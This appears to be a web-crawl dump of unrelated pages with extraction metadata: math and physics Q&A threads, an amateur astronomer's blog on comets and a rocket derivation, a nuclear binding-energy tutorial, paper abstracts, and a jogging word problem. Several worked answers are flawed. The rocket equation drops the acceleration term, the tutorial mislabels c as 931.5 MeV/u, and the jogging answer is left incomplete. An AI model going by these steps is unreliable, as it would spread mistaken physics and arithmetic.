S | 2020-04-09 11:23:01 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5014122724533081, "perplexity": 4398.40754616581}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585371833063.93/warc/CC-MAIN-20200409091317-20200409121817-00196.warc.gz"} |
https://forum.math.toronto.edu/index.php?PHPSESSID=k441o32850lkospornhudrbhs7&topic=2359.0;prev_next=next | ### Author Topic: More on inversion (Read 589 times)
#### Zhekai Pang
• Newbie
• Posts: 3
• Karma: 0
##### More on inversion
« on: September 15, 2020, 07:47:28 PM »
In addition to the last slide of today's lecture.
« Last Edit: September 15, 2020, 07:51:06 PM by Zhekai Pang »
#### RunboZhang
• Sr. Member
• Posts: 51
• Karma: 0
##### Re: More on inversion
« Reply #1 on: September 16, 2020, 03:46:45 PM »
Hi Zhekai, thank you for your sharing. I have two questions regarding your notes. Firstly, how did you derive A prime and B prime? Did you convert A and B in polar form and calculate their inverse, and then represent on the graph? Secondly, how did you know that z*zbar = r^2?
#### Victor Ivrii
Note that our inversion differs from geometric one $\vec{z}\to \frac{\vec{x}}{|\vec{x}|^2}$. It includes a mirror-reflection. See handout (I made a picture based on your example, corrected. Thanks a lot) | 2022-07-01 01:24:46 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8068417906761169, "perplexity": 7689.921423030972}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656103917192.48/warc/CC-MAIN-20220701004112-20220701034112-00313.warc.gz"} |
https://physics.stackexchange.com/questions/54491/can-the-speed-of-an-electromagnetic-wave-be-measured-in-the-absence-of-neutrinos | # Can the speed of an electromagnetic wave be measured in the absence of neutrinos?
Let me explain better: from what I understand neutrinos are so pervasive they are literally everywhere. And since they have such a tiny electric charge they barely interact with anything and cannot be "removed" or "shielded" from an area in order to take a measurement of light speed in their absence. However, all three neutrino flavors do have some charge (see neutrino oscillation) and do interact to a very small degree.
So, my question is: if we can only ever measure the speed of light in the presence of neutrinos, could it be that the limit of the speed of light is actually the "resistance" of the neutrinos to the energy passing through it?
• Neutrinos are not charged particles... they are electrically neutral. I think you're getting the weak interaction confused with a tiny electric charge. – Kitchi Feb 20 '13 at 11:02
• To elaborate on Kitchi's point: neutrinos don't have a tiny charge, they have zero charge. Neutrino oscillation is evidence that they have mass, not charge. So neutrinos and photons do not interact at all in the standard model, except for a process in which they temporarily turn into a virtual charged lepton and W boson. Such interactions are incredibly suppressed by the large mass of the W, so they have no measurable impact on light propagation. – Michael Brown Feb 20 '13 at 12:24
• Well, this is straight from the Wikipedia page on neutrinos: "The discovery of neutrino flavor oscillations implies that neutrinos have mass. The existence of a neutrino mass strongly suggests the existence of a tiny neutrino magnetic moment[14] of the order of 10−19 μB, allowing the possibility that neutrinos may interact electromagnetically as well." – Andy Feb 20 '13 at 13:00
• @Andy A magnetic moment is not the same thing as an electric charge. Neutral particles can have a magnetic moment. Another example is the neutron, which gets its magnetic moment from its internal structure (quarks). The neutrino would get its moment from the virtual process I mentioned involving the W's, though I didn't actually know the magnitude of it. So thanks for that. :) – Michael Brown Feb 20 '13 at 13:35
• The vacuum contains virtual particles of all species. Note that there are several question one could reasonable ask in this realm. Things like "Would the speed of light be different in the absence of field-theoretical fluctuations?" or "Can QFTs explain the permitivity and permeability of free space from first principles?" – dmckee --- ex-moderator kitten Feb 20 '13 at 14:07
• @Andy: There are estimations of the neutrino flux from the Sun, and it fades as $1/R^2$. I do not remember the numbers and I currently cannot search for them, unfortunately, sorry. – Vladimir Kalitvianski Feb 20 '13 at 13:27 | 2020-09-24 17:32:24 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7855660319328308, "perplexity": 568.3533921965579}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-40/segments/1600400219691.59/warc/CC-MAIN-20200924163714-20200924193714-00388.warc.gz"} |
https://pachacoti.wordpress.com/2011/07/ | # 臨七夕雜談
「夫書者,玄妙之伎也,若非通人志士,學無及之。大抵書須存思,余覽李斯等論筆勢,及鐘繇書,骨甚是不輕,恐子孫不記,故敘而論之。
「夫 書,不貴平正安穩。先須用筆,有偃有仰,有欹有斜,或小或大,或長或短。凡作一字,或類篆籀,或似鵠頭;或如散,或近八分;或如蟲食木葉,或如水中科 斗;或如壯士佩劍,或似婦女纖麗。欲書先構筋力,然後裝束,必注意詳雅起發,綿密疏闊相間。每作一點,必須懸手作之,或作一波,抑而後曳。每作一字,須用 數種意:或橫畫似八分,而發如篆籀;或豎牽如深林之喬木,而屈折如鋼鉤;或上尖如枯桿,或下細如針芒;或轉側之勢似飛鳥空墜,或稜側之形如流水激來。作一 字,橫豎相向;作一行,明媚相承。第一須存筋藏鋒,滅跡隱端。用尖筆須落鋒混成,無使毫露浮怯;舉新筆爽爽若神,即不求於點畫瑕玷也。若作一紙之書,須字 字意別,勿使相同。若書虛紙,用強筆;若書強紙,用弱筆:強弱不等,則蹉跌不入。
「凡書貴乎沉靜,令意在筆前,字居心後,未作之 始,結思成矣。仍下筆不用急,故須遲。何也?筆是將軍,故須遲重。心欲急不宜遲,何也?心是箭鋒,箭不欲遲,遲則中物不入。夫字有緩急,一字之中何者有緩 急?至如「烏」字,下手一點,點須急,橫直即須遲,欲「烏」之腳急,斯乃取形勢也。每書欲十遲五急,十曲五直,十藏五出,十起五伏,方可謂書。若直筆急牽 裹,此暫視似書,久味無力。仍須用筆著墨,不過三分,不得深浸,毛弱無力。墨用松節同研,久久不動彌佳矣。」
「纖雲巧弄,飛星傳恨,銀漢迢迢暗度。金風玉露一相逢,便勝卻人間無數。
「柔情似水,佳期如夢,忍顧鵲橋歸路。兩情若是久長時,又豈在朝朝暮暮。」
# Calculation Orbit for C/2011 L4 (III)
As MPEC 2011-N34 released the latest astrometric observations of comet C/2011 L4, I again calculated an orbital solution for this promising vagabond in our solar system:
My solution is too quite close to which was published in MPEC 2011-N34. To obtain my solution I set perturbers including Jupiter, Saturn, Uranus and Neptune, i.e. the four planets with the greatest masses in our solar system. We can see that there’s no great shift from what I acquired based upon previous astrometric observations, which suggests that the original prediction won’t change too much, which favors observers in southern hemisphere more. For me any comets brighter than mag. 13 should be called bright comets within my capability of observing it. Therefore it’s likely that I’ll be able to pick it up as early as Aug in 2011, if it behaves normally in accord with the lightcurve prediction.
# Calculation Orbit for C/2011 L4 (II)
MPEC 2011-N13 pulished new astrometric observations of comet C/2011 L4 so I feed these new data into FindOrb to verify if there will be great changes in orbital elements. Different from the last calcualtion, I added several perturbers, including Jupiter, Saturn, Uranus and Neptune, the four Jovial planets with the heaviest masses in our solar system, which will exert gravitation on the small body. Overall 15 observations are rejected as their residuals are larger than 1.0 arcsec based upon my calculation.
Seems there’re no much changes compared to previous results, meaning that observations condition won’t improve much. According to the solution, the comet should favor observers in southern hemisphere before perihelion.
# Comet Hunt
Having consulted with the reverent comet hunter, Don Machholz, from Colfax, the US, I decide to start comet hunt from this month.
Comet hunt, it has been my perpetual dream since my early childhood yet has been obstackled by the sky condition where I live as it’s frequently hazy and teemed with severe light pollution. By no means can I see the should-have-be spectacular summer milky way even though at predawn when many people go to bed and the majority of lights are off.
Under such unfavorable circumstances, I can only focus mainly on planetary observations. At times when there’re some bright comets in nightskies, I’ll train my 10cm-refractor that I purchased in 2003 to have a look at them. But in many cases, I can only observe comets faint to 8 mag, condensed no less than DC=2, which obviously can’t suffice my ambition.
Luckily, some ten kilometers away northeast to the downtown lies my maternal grandparents’ house, where the sky condition is much better. During my primary school I often went there to have nightsky observations of DSOs through my first scope — a small 8cm-refractor, now already obsolete. The sky there spellbound me deeply. Countless stars resembled the glimmering jewelry placed in front of a mighty black velvet. M13 used to be a very easy object to naked eye, so did M31 and various DSOs ancored in the fabulous summer milky way. Furthermore, every spring night when it was clear, which is yet rare owing to influence from the monsoon, I could well see the southern Cross as well as Rigil Kent and Hadar to its east above the south horizon by naked eye.
It would have been a wonderful place for me to comet hunt as seen from today. But, it’s a great pity, I must confess that I didn’t have any ability to conduct comet hunt at that time in that, weirdly, formatively from the habit I formed in urban area that I still firmly sticked to planetary observations even under such superb circumstances, paying little attention to comets, as an inertia. Therefore I intensely lacked experience of comets, let alone to begin comet hunt! It was not until the new year’s day in 2005 when I observed C/2004 Q2 (Machholz) in the chillest atmosphere I had ever experienced, the first comet I have ever seen, albeit several attempts had taken before but vainly, did I start to concentrate on cometary observations.
Unfortunately now my precious foundation, at least for me, has been stained — the municipality authorities widened a road not far from my site and a lot of bright road lights have been come into use since 2007. To make matters worse, a new avenue was finished in 2010 freight with powerful road lights on at nights, despite some kilometers away to the south, yet leading to a fairly bright southern sky… People quite second to these promotions as they observe that they needn’t so be scare when walking along the road in eerie darkness as in the past. So my sound is weak.
It’s fatal to me. And I have no idea stop the trend. Dark sky is a rare estate now. My new 8″ Dob from Mr. Tin from Amoi made in 1995 gives me some piteous compensation to fight against the brighter and brighter nightskies. My faintest comet that has ever seen was 103P/Hartley in early August last year, whose brightness is then estimated as 12.8. I’m sure my eyes have been well trained during these years that I’m so proud of myself that no any other observer around me can detect objects as faint as I can. When I point out that something, for example, a comet or a galaxy of 9 mag is quite obvious through the eyepiece to me under light polluted condition, other people, however, need to exert themselves to attempt a tiny glimpse of the blotch of light, or, in most cases, see nothing whatsoever; it’s a great luck to me! Thereby I have some confidence in my future comet hunt.
I clearly remember the order in importance suggested by Don, that it’s the eye, the conditions, and finally the scope that decides how faint one sees. I totally agree wih him in accord with my own experience. My eyes are actually the best weapon!
I frequently dream of discovering a new comet, but now I decide to set off to conduct real comet hunts in nightskies. The opportunity is always there, however small it is, and the key to success is whether you give it a try. During the approaching summer vacation, I’ll put my dream into practice. I need to find out the best means for me to sweep the sky, the rate and the way to recognize DSOs as fast as I can against a printed star atlas. I need to form my own pattern.
Undoubtedly I know there’s no much opportunity for me to make my dream come true this life, but I won’t get repentent with any complain when mortibund in that I’ve been trying my best. In fact, varieties and myriad of DSOs will satisfy me already through the eyepiece; they’ll awe me deeply, and delight me philosophically, as I’m seeing the mighty universe through my own eyes by myself. We human often speak highly of ourselves, busy seeking reputation and vainglory. Every time when faced with the heaven, I calm down and retrospect myself, therebyunhappiness away. The heaven is my real friend; it rejoices me when I’m overwhelmed with sadness; it relieves me when I’m distressed.
If I become as miserable as Robert Burnham Jr. in the future, I won’t complaint a bit. Instead, I’ll enjoy myself.
Hmm, I must to put many trifles aside, and I’ll keep this way. It’s also so great that I don’t have any loveship that blocks my way at the moment. I mustn’t get entangled by this quackmire in the future, because this along with other trivia may well distract my concentration. It’s well known that a very negative fluctuation in emotion results in a smaller LM, i.e. I’m likely to lose faint objects that should have been within my ability. All of these must get away from me!
As Don suggested, I need to go to bed as early, so I’d love to take his advice. I’ll go to bed before 9 p.m. and get up at around 2:30 a.m. in summertime and about 3:30 a.m. in winter at every clear predawn, regardless of however hot or cold. I’ll apply for my driving liscence too, for the reason that with a car I myself can drive out to seek for more favorable sites to comet hunt with ease at predawn as what Shigeki Murakami, my great mentor, have been doing. I’ll learn to be as perseverent and patient as those esteemed hunters like Murakami san, Don, Kaoru Ikeya, and Tsutomu Seki. In fact I have been influenced by these figures directly or indirectly for long. Last year Murakami san sent me two books by Seki san, ホウキ星が呼んでいる, 未知の星を求めて, from which, although I can’t understand much Japanese, I’m still able to read out an industrious hunter who impact upon my heart deeply.
Best wishes to myself! Toast!
# On Conditions of Rocket Lift-off
I’ve encountered with a post in a forum asking that what the conditions would change if a rocket is lift off on the moon rather than on Earth. It’s an intriguing question and therefore I spent some time attempting to solve the problem. And now the solution which I believe is correct is shown as follows.
Let$F$denotes the gravity, while$M$and$\mu$
respectively denote the mass of the rocket itself and the one of fuel at a moment. After a moment of$\mathrm{d}t$, the combustion engine exhausts$\mathrm{d}\mu$mass of the fuel.
To simplify the problem, I ignore the details how a rocket lift off from the origin stationary status otherwise the force from the ground is likely to complicate the scenario, i.e. somehow the rocket now has already left the ground but I need to consider the conditions of the force that can drive the rocket up. Let the rocket’s velocity right at this moment be$\vec{u_{0}}$, and the gush-out fuel’s velocity with respect to the rocket’s be, supposingly, a constant$\vec{u_{0}}$.
Then according to momentum law, we can yield the following equation:
$\vec{F}{\mathrm{d}t}=(M+\mu-{\mathrm{d}\mu})\vec{u}+{\mathrm{d}\mu}(\vec{u}+\vec{v}_{rel})-(M+\mu)\vec{u}_0$
Now supposing that the rocket’s motion is parallel to the gravity, so all of the vectors can be introduced into scalar quantity easily. Let the gravitation to be a negative value, hereby yielding
$-F{\mathrm{d}t}=(M+\mu-{\mathrm{d}\mu})u+{\mathrm{d}\mu}(u-v_{rel})-(M+\mu)u_0$
Step further, we have
$-F{\mathrm{d}t}=(M+\mu){\mathrm{d}u}-{\mathrm{d}\mu}(u_0+v_{rel})$
or
$F+(M+\mu)\dot{u}=\dot{\mu}(u_0+v_{rel})$
Introducing gravitational acceleration, hence the gravity becomes$F=(M+\mu)g$, which then substitutes the equation above, yielding the final equation as following:
$\huge g=\frac{\dot{\mu}(u_0+v_{rel})}{(M+\mu)}$
Now we can draw conclusions from this equation that compared to lift-off on the earth as $g$ is smaller, there’s no need for the rocket covering so swiftly as on Earth, the gushing fuel’s speed with respect to the rocket itself doesn’t have to be so fast as well, and furthermore, the mass of fuel exhausted per unit time is unnecessarily so larger as on Earth.
Despite that there’s a omission of the detailed discussion about how a rocket can leave the ground, I think these conclusions are quite reasonable. | 2018-02-20 17:51:25 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 14, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4632042646408081, "perplexity": 2105.910499709941}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-09/segments/1518891813059.39/warc/CC-MAIN-20180220165417-20180220185417-00684.warc.gz"} |
https://www.key2physics.org/mass-defect-binding-energy-nuclear-force | Mass Defect, Binding Energy, and The Nuclear Force
To separate a nucleus to its individual components – the protons and neutrons, energy must be added to it. This energy is called binding energy, $$E_B$$ which is considered as the magnitude of the energy that holds the nucleons together. Since there is addition of energy, it follows that the rest energy, $$E_0$$ of the separated nucleons is greater than the rest energy of the nucleus, therefore, the rest energy of the nucleus can be expressed mathematically as $$E_0\; – \;E_B$$. The binding energy can be represented by the equation below:
$$E_B = (ZM_H + Nm_n -\; ^A_Z M) c^2$$ (1)
where
$$E_B$$ = binding energy with $$Z$$ protons and $$N$$ neutrons
$$Z$$ = atomic number
$$M_H$$ = mass of hydrogen atom
$$N$$ = number of neutrons
$$m_n$$ = mass of neutron
$$^A_Z M$$ = mass of neutral atom containing nucleus
$$c$$ = speed of light in a vacuum which has a value of $$931.5\; MeV/u$$
$$ZM_H$$ is the mass of $$Z$$ protons and $$Z$$ electrons combined as $$Z$$ neutral $$^1_1H$$ atoms. This is done to balance the $$Z$$ electrons contained in $$^A_ZM$$.
The mass of the nucleus is always less than the total mass of its nucleons by an amount of $$\Delta M = E_B/c^2$$. This mass, $$\Delta M$$ is called as the mass defect.
Example:
The neutral atomic mass of $$^{62}_{28}Ni$$ is $$61.928345\; u$$. Calculate:
1. Mass defect
2. Total binding energy
3. Binding energy per nucleon
Given:
$$Z = 28\\ M_H = 1.007825\; u\\ N = A - Z = 62 - 28 = 34\\ m_n = 1.008665\; u\\ ^A_ZM = 61.928345\; u$$
Solution:
1. The binding energy is just the mass defect multiplied by the square of the speed of light in vacuum. Thus, the mass defect, $$\Delta M$$ is
$$\Delta M = ZM_H + Nm_n - ^A_Z M\\ \;\;\;\;\;\; = [(28)(1.007825\; u)] + [(34)(1.008665\; u)] – 61.928345\; u\\ \;\;\;\;\;\;= 0.585365\; u.$$
1. Using the value of $$\Delta M$$ in solution a and multiplying it by the square of the speed of light in vacuum, we can solve for the total binding energy.
$$E_B = (\Delta M)c^2\\ \;\;\;\; = (0.585365\; u)( 931.5\; MeV/u)\\ \;\;\;\; = 545.3\; MeV$$
1. The binding energy per nucleon can be obtained by dividing the total binding energy by the mass number. Since $$A=62$$, which is the mass number, the binding energy of each nucleon is,
$${E_B \over A} = {545.3\; MeV \over 62} = 8.795\; MeV.$$
The Nuclear Force
Despite the electrical repulsion of protons, the protons and neutrons can be held together by a force. This force, considering the nuclear structure, is called as the nuclear force. Nuclear force has the following characteristics:
1. Nuclear force is independent on the charge. Both the proton and the neutron are bounded equally.
2. It has a short range. Within its range, the nuclear force is much stronger than the electrical forces, which is the reason why nucleus can be stable.
3. A particular nucleon cannot interact simultaneously with all the other nucleons in the nucleus, instead, it can interact immediately to the other nucleons within the nearest area to it. This is due to the nearly constant density of nuclear matter and the nearly constant binding energy per nucleon of the larger nuclides.
4. The nuclear force favors the binding of pair of protons and pair of neutrons, in which each pair have opposite spins. | 2021-07-26 03:38:34 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6842681765556335, "perplexity": 379.47298854715007}, "config": {"markdown_headings": false, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046152000.25/warc/CC-MAIN-20210726031942-20210726061942-00454.warc.gz"} |
https://math.stackexchange.com/questions/1105397/pick-out-the-correct-choices-tifr-2015 | # Pick out the correct choices -TIFR 2015
Let $f:\mathbb R\rightarrow \mathbb R$ be a continuous function and $A \subset \mathbb R$ be defined by $A=\{y \in \mathbb R:y=\lim _{n\rightarrow \infty}f(x_n),$for some sequence $x_n\rightarrow \infty\}$
Then the set $A$ is necessarily
A.a connected set
B.compact set
C. a singleton set
D.None of above
Now since $f$ is a continuous function and $x_n$ diverges so $f(x_n)$ will also diverge.Hence the set can't be bounded and hence not compact
Also it may not be singleton as $f(x_n)$ may be either $\infty$ or -$\infty$
Not sure with A.Can someone please check my solution and suggest required edits
Continuous functions take convergent sequences to convergent sequences, but you can't say the same for divergent sequences. For instance, consider a constant function. For a better example, which will also give a hint for how to solve your problem, take $f(x) = \sin(x)$. For a still better example, think of how you could modify this $f$ to change the set $A$...
• May be $x_n=n\pi$ divergent but $f(x_n)$ is not.But I did not get what you are asking about modification – Learnmore Jan 15 '15 at 14:47
• @learnmore: if $f(x)=\sin(x)$, then $A=[-1,1]$, which is both compact and connected. But if you modify $f$ slightly, you can make $A$ non-compact. Think about that for an hour or two before coming straight back with "I don't get it". – TonyK Jan 15 '15 at 14:56
• should I modify $f$ such that its image becomes $[-1,1)$ or $(-1,1]$ which is not closed and hence not compact @TonyK – Learnmore Jan 16 '15 at 2:34 | 2019-07-21 10:43:42 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8441324234008789, "perplexity": 269.427893574005}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-30/segments/1563195526948.55/warc/CC-MAIN-20190721102738-20190721124738-00261.warc.gz"} |
https://core.ac.uk/display/2185738 | Location of Repository
## Some Baer Invariants of Free Nilpotent Groups
### Abstract
We present an explicit structure for the Baer invariant of a free $n$th nilpotent group (the $n$th nilpotent product of infinite cyclic groups, $\textbf{Z}\st{n}* \textbf{Z}\st{n}*...\st{n}*\textbf{Z}$) with respect to the variety ${\cal V}$ with the set of words $V=\{[\ga_{c_1+1},\ga_{c_2+1}]\}$, for all $c_1\geq c_2$ and $2c_2-c_1>2n-2$. Also, an explicit formula for the polynilpotent multiplier of a free $n$th nilpotent group is given for any class row $(c_1,c_2,...,c_t)$, where $c_1\geq n$.Comment: 17 page
Topics: Mathematics - Group Theory, 20E34, 20E10, 20F18
Year: 2011
OAI identifier: oai:arXiv.org:1103.5151 | 2018-12-12 22:24:25 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9096299409866333, "perplexity": 1074.9187015870375}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-51/segments/1544376824119.26/warc/CC-MAIN-20181212203335-20181212224835-00423.warc.gz"} |
https://conference.ippp.dur.ac.uk/event/470/contributions/2477/ | The 34th International Symposium on Lattice Field Theory (Lattice 2016)
24-30 July 2016
Highfield Campus, University of Southampton
Europe/London timezone
$\theta$-dependence of the massive Schwinger model
27 Jul 2016, 11:50
20m
Building 67 Room 1003 (Highfield Campus, University of Southampton)
Building 67 Room 1003
Highfield Campus, University of Southampton
Talk Chiral Symmetry
Speaker
Eduardo Royo (Universidad de Zaragoza)
Description
Understanding the role of the $\theta$ parameter in QCD and its connection with the strong CP problem and axion physics is one of the major challenges for high energy theorists. Due to the sign problem, at present only the QCD topological susceptibility is well known. Using an algorithmic approach that could potentially be extended to QCD, we study as a first step the $\theta$-dependence in the massive Schwinger model, and try to verify a conjecture of Coleman.
Primary authors
Dr Alejandro Vaquero Aviles-Casco (INFN, Milano Bicocca) Dr Eduardo Follana (Universidad de Zaragoza) Eduardo Royo (Universidad de Zaragoza) Dr Giuseppe Di Carlo (LNGS - INFN) Dr Vicente Azcoiti (Universidad de Zaragoza)
Slides | 2020-08-15 05:53:14 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5257021188735962, "perplexity": 7936.801532734322}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-34/segments/1596439740679.96/warc/CC-MAIN-20200815035250-20200815065250-00067.warc.gz"} |
http://papers.nips.cc/paper/6050-differential-privacy-without-sensitivity | # NIPS Proceedingsβ
## Differential Privacy without Sensitivity
[PDF] [BibTeX] [Supplemental] [Reviews]
### Abstract
The exponential mechanism is a general method to construct a randomized estimator that satisfies $(\varepsilon, 0)$-differential privacy. Recently, Wang et al. showed that the Gibbs posterior, which is a data-dependent probability distribution that contains the Bayesian posterior, is essentially equivalent to the exponential mechanism under certain boundedness conditions on the loss function. While the exponential mechanism provides a way to build an $(\varepsilon, 0)$-differential private algorithm, it requires boundedness of the loss function, which is quite stringent for some learning problems. In this paper, we focus on $(\varepsilon, \delta)$-differential privacy of Gibbs posteriors with convex and Lipschitz loss functions. Our result extends the classical exponential mechanism, allowing the loss functions to have an unbounded sensitivity. | 2017-04-25 22:15:39 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.23849649727344513, "perplexity": 512.4104640183256}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917120881.99/warc/CC-MAIN-20170423031200-00511-ip-10-145-167-34.ec2.internal.warc.gz"} |
https://web2.0calc.com/questions/jogging | +0
# Jogging
0
142
1
last week, vincenzo jogged 3 1/2 miles during the week and 5/6 miles on the weekend. this week, he jogged 3/10 miles less than last week. how many miles vincenzo jog this week?
Mar 4, 2021
#1
+57
+1
$$3\frac{1}{2}$$=$$\frac{7}{2}$$ as an improper fraction
$$\frac{7}{2}$$ = $$\frac{21}{6}$$
$$\frac{21}{6}$$$$\frac{5}{6}$$=$$\frac{26}{6}$$$$\frac{13}{3}$$
So Vincenzo jogged 13/3 miles during the whole week
